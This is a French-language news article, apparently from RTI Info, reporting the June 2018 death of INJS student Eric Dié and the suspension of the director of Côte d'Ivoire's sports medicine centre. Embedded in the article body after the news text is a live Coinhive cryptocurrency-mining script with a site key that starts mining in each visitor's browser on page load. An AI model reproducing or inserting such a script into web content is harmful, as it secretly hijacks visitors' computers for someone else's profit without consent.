Décès de l'étudiant Eric Dié (INJS) : Le Directeur du Centre de médecine du sport suspendu.
0
 

Écouter
Décès de l'étudiant  Eric Dié (INJS) : Le Directeur du Centre de médecine du sport suspendu.

Décès de l'étudiant Eric Dié (INJS) : Le Directeur du Centre de médecine du sport suspendu.

RTI Info / Boris Odilon BLE | Lu 2092 fois | Publié

Le Directeur du centre national de médecine sportive, Yacé Félicien, a été suspendu de ses fonctions. La décision est survenue suite à une réunion présidée par le Premier ministre Gon Coulibaly consécutive au décès accidentel de l'étudiant Eric Dié, inscrit en licence 3 éducation et motricité à l’Institut National de la Jeunesse et des Sports (INJS).

Le gouvernement ivoirien a réagi suite à l’annonce du décès d’un étudiant de l’INJS dans la journée du mercredi 06 juin 2018. Dans cette disparition tragique, l’absence de secours a été décriée par les étudiants.

En effet, suite à sa chute brutale et après avoir reçu la barre d’un poteau d’handball sur la nuque, l’étudiant Eric Dié n’a pu bénéficier de soins dans l’urgence. Aucun médecin n’était présent au Centre de Médecine du Sport (CMS) pourtant logé à l’INJS. La sanction n’a pas tardé. Le directeur du CMS a été suspendu. L’annonce a été faite par le ministre François Amichia. 

Le Gouvernement a diligenté une enquête pour situer les responsabilités, il exprime sa compassion à la famille et aux étudiants.

 

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Agnibilékrou: Pénurie de viande sur les marchés du fait de la grève

Un séminaire d’implémentation du contrôle interne dans les administrations économiques et financières ouvert à Abidjan

Oumé: Des enseignants d’anglais instruits sur “l’apprentissage coopératif"

L’utilisation de contraception moderne a permis d’éviter 440 000 grossesses non désirées et 157 000 avortements pratiqués dans de mauvaises conditions

Le Hamas revendique les tirs de roquettes de Gaza vers Israël (communiqué)